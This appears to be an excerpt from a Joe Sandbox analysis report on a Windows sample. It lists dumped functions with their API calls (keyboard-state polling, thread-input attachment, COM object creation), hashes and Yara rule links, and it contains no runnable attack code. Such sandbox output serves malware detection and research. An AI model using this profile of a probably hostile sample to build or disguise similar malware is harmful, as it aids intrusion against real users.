                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EC7BE3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                          • Opcode ID: e0551f74cbb6859b2579e2b3b5510381c1124e48c698bc4ed5494f0e7f5566c6
                                                                                                          • Instruction ID: 085ce2b0298d8a82b7b260b45b6b2a383a4b82ac2b422f5c8c4a43dfc0242144
                                                                                                          • Opcode Fuzzy Hash: e0551f74cbb6859b2579e2b3b5510381c1124e48c698bc4ed5494f0e7f5566c6
                                                                                                          • Instruction Fuzzy Hash: B5318C32105218AFDF119F65EC49FDB3B6AFF09364F14121AFA55B61A0C732D825DBA0
                                                                                                          Function 00E67030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E6706B
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          • __gmtime64_s.LIBCMT ref: 00E67104
                                                                                                          • __gmtime64_s.LIBCMT ref: 00E6713A
                                                                                                          • __gmtime64_s.LIBCMT ref: 00E67157
                                                                                                          • __allrem.LIBCMT ref: 00E671AD
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E671C9
                                                                                                          • __allrem.LIBCMT ref: 00E671E0
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E671FE
                                                                                                          • __allrem.LIBCMT ref: 00E67215
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E67233
                                                                                                          • __invoke_watson.LIBCMT ref: 00E672A4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 384356119-0
                                                                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                          • Instruction ID: c7ce95d4fdab2a6288ec9bde50fe2fc2d35f33d14d6ae373df2c05e6072b1037
                                                                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                          • Instruction Fuzzy Hash: 69712BB1A84707ABE7149F79EC41B5AB3E8AF013A8F14922AF554F72C2E770DD408790
                                                                                                          Function 00EA2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA2CE9
                                                                                                          • GetMenuItemInfoW.USER32(00F07890,000000FF,00000000,00000030), ref: 00EA2D4A
                                                                                                          • SetMenuItemInfoW.USER32(00F07890,00000004,00000000,00000030), ref: 00EA2D80
                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00EA2D92
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00EA2DD6
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00EA2DF2
                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00EA2E1C
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00EA2E61
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EA2EA7
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA2EBB
                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA2EDC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4176008265-0
                                                                                                          • Opcode ID: 406e899d3b0554d9bba4bcc2e637d18f8d72bd5e57f046ce238ace46fa3f941d
                                                                                                          • Instruction ID: abf171e74037720807d7d51a572be22e489bbba5d273799dbd45a24645129468
                                                                                                          • Opcode Fuzzy Hash: 406e899d3b0554d9bba4bcc2e637d18f8d72bd5e57f046ce238ace46fa3f941d
                                                                                                          • Instruction Fuzzy Hash: CE61A170900249AFDB22DF68DC84ABEBBB8EB4A308F14905DF941BB251D731BD45DB20
                                                                                                          Function 00EC7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EC75CA
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EC75CD
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC75F1
                                                                                                          • _memset.LIBCMT ref: 00EC7602
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC7614
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EC768C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 830647256-0
                                                                                                          • Opcode ID: 50e26af5242f1305801581fcb4230c567f26f3776a7253b5537388fd4d918635
                                                                                                          • Instruction ID: 47d3daaa91c190b8727a9454e9f0d72103576b1110d6e280b7a14e5ce1cc6f74
                                                                                                          • Opcode Fuzzy Hash: 50e26af5242f1305801581fcb4230c567f26f3776a7253b5537388fd4d918635
                                                                                                          • Instruction Fuzzy Hash: 45617774904208AFDB10DFA8CD85FEE77F8AB09704F10419AFA54A72A1C771AE42DF60
                                                                                                          Function 00E977B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E977DD
                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E97836
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00E97848
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E97868
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00E978BB
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E978CF
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E978E4
                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E978F1
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E978FA
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E9790C
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E97917
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          • Opcode ID: 55a7f3af03a5d0406d44a4eb647ad860af3140e50f7ac778e418d7121f2e28a0
                                                                                                          • Instruction ID: 264e30555a00ae9745207ae2c8a9454042de000a722012a2f0ab73280ed50c92
                                                                                                          • Opcode Fuzzy Hash: 55a7f3af03a5d0406d44a4eb647ad860af3140e50f7ac778e418d7121f2e28a0
                                                                                                          • Instruction Fuzzy Hash: 97416335A00119AFCF04DFA5D848EEDBBB9FF48344F05806AE955B7261C730A949CFA0
                                                                                                          Function 00EA0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00EA0530
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00EA05B1
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00EA05CC
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00EA05E6
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00EA05FB
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00EA0613
                                                                                                          • GetKeyState.USER32(00000011), ref: 00EA0625
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00EA063D
                                                                                                          • GetKeyState.USER32(00000012), ref: 00EA064F
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00EA0667
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00EA0679
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: cf0b107c7a7c5858671e12290199129a06a43bc07914de64f7b1d729e0076da7
                                                                                                          • Instruction ID: 9086cda3de8d7534dfcf871655ebef095dbdcb083f0e70e4e6a12490cb979e57
                                                                                                          • Opcode Fuzzy Hash: cf0b107c7a7c5858671e12290199129a06a43bc07914de64f7b1d729e0076da7
                                                                                                          • Instruction Fuzzy Hash: 8F41EA309047C95DFF31866498043B5BFA0AB9B34CF08615AD9C56F5C1EB94B9D8CF92
                                                                                                          Function 00EB8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • CoInitialize.OLE32 ref: 00EB8AED
                                                                                                          • CoUninitialize.OLE32 ref: 00EB8AF8
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00ED3BBC,?), ref: 00EB8B58
                                                                                                          • IIDFromString.OLE32(?,?), ref: 00EB8BCB
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB8C65
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB8CC6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 834269672-1287834457
                                                                                                          • Opcode ID: 5c6d5b0dce061735381c16e7d210e056da25e92f983d52b9b06b0ff68d4a578f
                                                                                                          • Instruction ID: d5c316772036e189b3c5d8249663e4c2bd63c47fb3c1df46409c856a8c74bd7e
                                                                                                          • Opcode Fuzzy Hash: 5c6d5b0dce061735381c16e7d210e056da25e92f983d52b9b06b0ff68d4a578f
                                                                                                          • Instruction Fuzzy Hash: A261AFB42057019FC710DF64DA89BABBBE8EF45714F142809F581AB391CB70ED48CBA2
                                                                                                          Function 00EABB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EABB13
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EABB89
                                                                                                          • GetLastError.KERNEL32 ref: 00EABB93
                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00EABC00
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                          • API String ID: 4194297153-14809454
                                                                                                          • Opcode ID: 9867e155910909dad0511ed72087417954200d37a6620093a4bc6defba5a8d6b
                                                                                                          • Instruction ID: c40b61e162ad4fafef71116b45f627a9ff928af3604689807b286512ae6f94dd
                                                                                                          • Opcode Fuzzy Hash: 9867e155910909dad0511ed72087417954200d37a6620093a4bc6defba5a8d6b
                                                                                                          • Instruction Fuzzy Hash: AE31A335A002089FCB10EF65C845FF9B7B4EF4A304F14515AE905FB2D6DB71A945CB60
                                                                                                          Function 00E99B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E99BCC
                                                                                                          • GetDlgCtrlID.USER32 ref: 00E99BD7
                                                                                                          • GetParent.USER32 ref: 00E99BF3
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E99BF6
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00E99BFF
                                                                                                          • GetParent.USER32(?), ref: 00E99C1B
                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E99C1E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 1536045017-1403004172
                                                                                                          • Opcode ID: c5cd1984ffee36ddcecafbf2978a2518e22f4d8803b865f1bb4bd2127ebca3eb
                                                                                                          • Instruction ID: 326858163abb2616eb1214aa14b5ccb3f10024e8cab9769872242f78467b2aa7
                                                                                                          • Opcode Fuzzy Hash: c5cd1984ffee36ddcecafbf2978a2518e22f4d8803b865f1bb4bd2127ebca3eb
                                                                                                          • Instruction Fuzzy Hash: 8F21F174901108AFDF04EBA5DC85EFEBBB4EF95300F10125AF961B72D2EB358818DA20
                                                                                                          Function 00EB8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB8FC1
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EB8FEE
                                                                                                          • CoUninitialize.OLE32 ref: 00EB8FF8
                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00EB90F8
                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EB9225
                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00ED3BDC), ref: 00EB9259
                                                                                                          • CoGetObject.OLE32(?,00000000,00ED3BDC,?), ref: 00EB927C
                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB928F
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EB930F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB931F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2395222682-0
                                                                                                          • Opcode ID: 668f2dd885df5c18c477b5670e70582312bf368f501bd3b5e39a040a9596b4d9
                                                                                                          • Instruction ID: e4b2b56e32059848f4f1ee52499902b1db8d42352be5216f879c7d4dc5a4963a
                                                                                                          • Opcode Fuzzy Hash: 668f2dd885df5c18c477b5670e70582312bf368f501bd3b5e39a040a9596b4d9
                                                                                                          • Instruction Fuzzy Hash: 4DC14971604305AFC704DF68D884AABB7E9FF89348F00591DF689AB262DB71ED05CB52
                                                                                                          Function 00EA19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00EA19EF
                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A03
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00EA1A0A
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A19
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA1A2B
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A44
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A56
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A9B
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1AB0
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1ABB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: 07fcf77d1d79deaf712d834ce64ecaba0e33f39585738251feb140fde54bb2a7
                                                                                                          • Instruction ID: dbf593698c0566218197d085828629f64d0c0b0b586bab30075a018d82600de2
                                                                                                          • Opcode Fuzzy Hash: 07fcf77d1d79deaf712d834ce64ecaba0e33f39585738251feb140fde54bb2a7
                                                                                                          • Instruction Fuzzy Hash: FD31E471606209BFDB10DF25EC44FA977AAFB5A39AF144196F900EE190DB74AD408F50
                                                                                                          Function 00E7C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000008), ref: 00E4260D
                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00E42617
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00E4262C
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00E42634
                                                                                                          • GetClientRect.USER32(?), ref: 00E7C0FC
                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E7C113
                                                                                                          • GetWindowDC.USER32(?), ref: 00E7C11F
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00E7C12E
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E7C140
                                                                                                          • GetSysColor.USER32(00000005), ref: 00E7C15E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3430376129-0
                                                                                                          • Opcode ID: b616e7623708f022677ffa4a8cd08b3497739335a98e21736cb0cfa5f837f8b4
                                                                                                          • Instruction ID: aff0b151c0558c44ee8c4e246a2b0fdbf7f9496197b0d83ec4d97163eaf65057
                                                                                                          • Opcode Fuzzy Hash: b616e7623708f022677ffa4a8cd08b3497739335a98e21736cb0cfa5f837f8b4
                                                                                                          • Instruction Fuzzy Hash: 46117C31502205BFDB615FB5FC08BE97BB5EB08321F5842A6FA69A50E1CB310955EF11
                                                                                                          Function 00E4AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E4ADE1
                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00E4AE80
                                                                                                          • UnregisterHotKey.USER32(?), ref: 00E4AFD7
                                                                                                          • DestroyWindow.USER32(?), ref: 00E82F64
